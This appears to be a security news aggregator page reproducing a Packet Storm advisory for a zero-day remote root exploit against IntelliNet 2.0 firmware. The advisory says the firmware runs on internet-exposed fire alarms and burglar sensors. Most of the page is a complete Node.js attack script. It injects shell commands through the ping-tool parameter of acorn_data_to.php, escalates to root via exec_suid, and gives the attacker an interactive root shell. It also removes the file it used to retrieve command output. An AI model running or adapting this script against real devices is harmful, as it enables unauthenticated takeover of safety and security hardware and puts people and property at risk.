Security
Headlines
HeadlinesLatestCVEs

Headline

IntelliNet 2.0 Remote Root

Zero day remote root exploit for IntelliNet version 2.0. It affects multiple devices of AES Corp and Siemens. The exploit provides a remote shell and escalates your permissions to full root permissions by abusing exec_suid. No authentication needed at all, neither any interaction from the victim. The firmware affected by this exploit runs on fire alarms, burglar sensors and environmental devices, all on the internet, all vulnerable, no patch. Full control over hardware and software with no restrictions, you can manipulate battery voltage and even damage the hardware with unknown outcomes.

Packet Storm
#git#intel#php#auth#zero_day
#!/usr/local/bin/nodeconst { execSync } = require('child_process');const readline = require('readline');let TARGET = '';let COMMAND = '';let SESSION = '';const ESCALATE = '/usr/aes/bin/exec_suid';console.log(`⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣧⣶⣶⣶⣦⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⢿⣿⣿⣿⣏⠉⠉⠛⠛⠿⣷⣕⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⢝⠄⢀⣿⡿⠻⣿⣄⠀⠀⠀⠀⠈⢿⣧⡀⣀⣤⡾⠀⠀⠀⠀⠀⠀⢰⣿⡡⠁⠀⠀⣿⡇⠀⠸⣿⣾⡆⠀⠀⣀⣤⣿⣿⠋⠁⠀⠀⠀⠀⠀⠀⢀⣷⣿⠃⠀⠀⢸⣿⡇⠀⠀⠹⣿⣷⣴⡾⠟⠉⠸⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⠗⡀⠀⠀⢸⣿⠃⣠⣶⣿⠿⢿⣿⡀⠀⠀⢀⣿⡇⠀⠀⠀⠀⠀⠀⠀⠘⡿⡄⣇⠀⣀⣾⣿⡿⠟⠋⠁⠀⠈⢻⣷⣆⡄⢸⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⢻⣷⣿⣿⠿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠻⣿⣷⣿⡟⠀⠀⠀⠀⠀⠀⢀⣰⣾⣿⠿⣿⣿⣾⣿⠇⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣿⣅⠀⠀⠀⠀⠀⠀⠀⠰⠊⠁⠀⠙⠪⣿⣿⣶⣤⣄⣀⣀⣀⣤⣶⣿⠟⠋⠙⢿⣷⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⡟⠺⠭⠭⠿⠿⠿⠟⠋⠁⠀⠀⠀⠀⠙⠏⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡟⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀╔════════════════════════════════════════════╗║ IntelliNet 2.0 Remote Root Exploit (0-Day) ║║ Author: Jean Pereira <[email protected]>     ║╚════════════════════════════════════════════╝`);const cleanUp = () => {  execSync(    `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;rm%20.gitignore;"`  );};const createShell = (cmd) => {  execSync(    `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;${encodeURIComponent(      [ESCALATE, cmd].join(' ')    )}%20%3E%20.gitignore;"`  );  return execSync(`curl -sL "http://${TARGET}/.gitignore"`).toString().trim();};const rl = readline.createInterface({  input: process.stdin,  output: process.stdout,});const interactiveShell = () => {  rl.question(`root@${SESSION.slice(8)}:~# `, (currentCommand) => {    if (currentCommand.trim() === '!q') {      console.log('Cleaning up...');      cleanUp();      rl.close();    } else {      COMMAND = currentCommand;      let output = createShell(COMMAND);      console.log(output);      interactiveShell();     }  });};rl.question('[*] Enter target IP: ', (targetIP) => {  TARGET = targetIP;  SESSION = createShell('echo a1b2c3d4$HOSTNAME');  if (!SESSION.startsWith('a1b2c3d4')) {    console.log('[*] Could not execute payload, aborting');    process.exit(0);  } else {    console.log('[*] Payload injected to firmware');    console.log('[*] Launching root shell via exec_suid');  }  console.log('');  interactiveShell();});rl.on('close', () => {  process.exit(0);});

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution